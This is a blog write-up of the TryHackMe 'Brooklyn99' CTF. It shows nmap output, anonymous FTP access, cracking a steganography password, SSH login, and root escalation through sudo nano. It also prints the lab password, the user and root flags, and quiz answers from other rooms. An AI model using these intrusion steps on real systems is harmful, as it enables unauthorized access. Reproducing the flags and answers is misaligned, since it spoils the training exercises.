Skip to main content

Brooklyn99 CTF

 

Tryhackme - Brooklyn99 CTF

 

NMAP - network mapper

 #nmap -sT -vv -sC -sV 10.10.254.255

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.192.14
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linuxcol 2.0)
| ssh-hostkey:
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQjh/Ae6uYU+t7FWTpPoux5Pjv9zvlOLEMn4vD2pYTeHDbzv7ww75UaUzPtsC8kM1EPbMQn1BUCvTNkIxQ34zmw5FatZWNR8/De/u/9fXzHh3K3uQzZaY7XBaDgmU6W0KEmLtKQPcueUomeYkqpL78o5+NjrGO3HwqAH2ED1Zadm5YFEvA0STaqn1G9o4ZHhWi8SJXlIJ6f6O1ea/VqyRJZG1KgbxQFU+zYlIddXpub93zdyMEpwaSIP2P7UTwYRF5r4PQfjAMGkG1mMsOi6v7xCrq/5RlF9ZVJ9nwq349ngG/KTkHtcOJnvXz
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABB5hVmiYQ8U3mXta5DX2zOeGJ6WTop8FCSbN1UIeV/9jhAQIiVENAW41IfiBYNj8Bm+WcSDKLaE8
|   256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP2hV8Nm+RfR/f2KZ0Ub/OcSrqfY1g4qwsz1k
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 

we found the 3 open ports: FTP , SSH and HTTP  

FTP  - File Transfer Protocol

let's check FTP port 21 

 #ftp 10.10.254.255
Connected to 10.10.254.255.
220 (vsFTPd 3.0.3)
Name (10.10.254.255:john): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.08 secs (1.4567 kB/s)

HTTP

On HTTP service we found an interesting comment that tells about steganography.

 


 AND,download the image ...
 


 

Steganography 

Let’s extract some info from the image... Agh!! It’s password protected.

 

STEGCRACKER  

Download here github - https://github.com/Paradoxis/StegCracker

let's command for terminal ... 

# stegcracker brooklyn99.jpg

StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)

Copyright (c) 2021 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which

will blast through the rockyou.txt wordlist within 1.9 second as opposed

to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

No wordlist was specified, using default rockyou.txt wordlist.

Counting lines in wordlist..

Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..

Successfully cracked file with password:<'react'>

Tried 20459 passwords

Your file has been written to: brooklyn99.jpg.out

<'react'>

# cat brooklyn99.jpg.out 
Holts Password:
fluffydog12@ninenine
 

Enjoy!!


The hidden text file contains a password...

SSH

#ssh holt@10.10.254.255

holt@brookly_nine_nine:~$ ls
nano.save  user.txt
holt@brookly_nine_nine:~$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee

USER FLAG - ee11cbb19052e40b07aac0ca060c23ee

 

PRIVILEAGE ESCALATION 

let's check here .. - https://gtfobins.github.io/gtfobins/nano/

HINT - Sudo is a good command. 

Let’s try sudo -l 

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbi\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano
 

ROOT FLAG

command - sudo /bin/nano /root/root.txt

 


FLAGS ..

USER FLAG - ee11cbb19052e40b07aac0ca060c23ee

ROOT FLAG - 63a9f0ea7bb98050796b649e85481845

 


Comments

Post a Comment

Popular posts from this blog

Windows Fundamentals 2

 TryHackMe - Windows Fundamentals 2 Task 1 Introduction  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed Task 2 System Configuration   #2.1 :- What is the name of the service that lists Systems Internals as the manufacturer?  Answer :- PsShutdown #2.2 :- Whom is the Windows license registered to? Answer :- Windows User #2.3 :- What is the command for Windows Troubleshooting? Answer :- C:\Windows\System32\control.exe /name Microsoft.Troubleshooting #2.4 :- What command will open the Control Panel? (The answer is  the name of .exe, not the full path) Answer :- control.exe Task 3 Change UAC Settings  #3 :- What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)  Answer :- UserAccountControlSettings.exe Task 4 Computer Management  #4.1 :- What is the command to open Computer Management? (The answer is the name of the .msc file, not the full
Post a Comment
Read more

Windows Fundamentals 3

 Tryhackme - Windows Fundamentals 3   Task-1 Introduction  #1:- Read the above and start the virtual machine.  Answer:- No Answer Needed Task-2 Windows Updates  #2:- There were two definition updates installed in the attached VM. On what date were these updates installed?  Answer:- 5/3/2021 Task-3 Windows Security  #3:- In the above image, which area needs immediate attention?  Answer:- virus & threat protection Task-4 Virus & threat protection  #4:- Specifically, what is turned off that Windows is notifying you to turn on?  Answer:- Real-time protection Task-5 Firewall & network protection  #5:- If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?  Answer:- public network Task-6 App & browser control  #6:- Read the above.  Answer:- No Answer Needed Task-7 Device security  #7:- What is the TPM?  Answer:- Trusted Platform Module Task-8 BitLocker #8:- What must a user insert on computers that DO NOT have a TPM version 1.2 or la
Post a Comment
Read more

Linux Fundamentals Part 1

TryHackMe - Linux FundamentalsPart 1  #1 :- Research: What year was the first release of a Linux operating system?  Answer :-1991  #2 :- if we wanted to output the text "TryHackMe", what would our command be?  Answer :-echo TryHackMe  #3 :- What is the username of who you're logged in as on your deployed Linux machine? Answer :-tryhackme #4 :- On the Linux machine that you deploy, how many folders are there?    Answer :-2 #5 :- Which directory contains a file?  Answer :-folder4 #6 :- What is the contents of this file? Answer :-Hello World #7 :- Use the cd command to navigate to this file and find out the new current working directory. What is the path? An
Post a Comment
Read more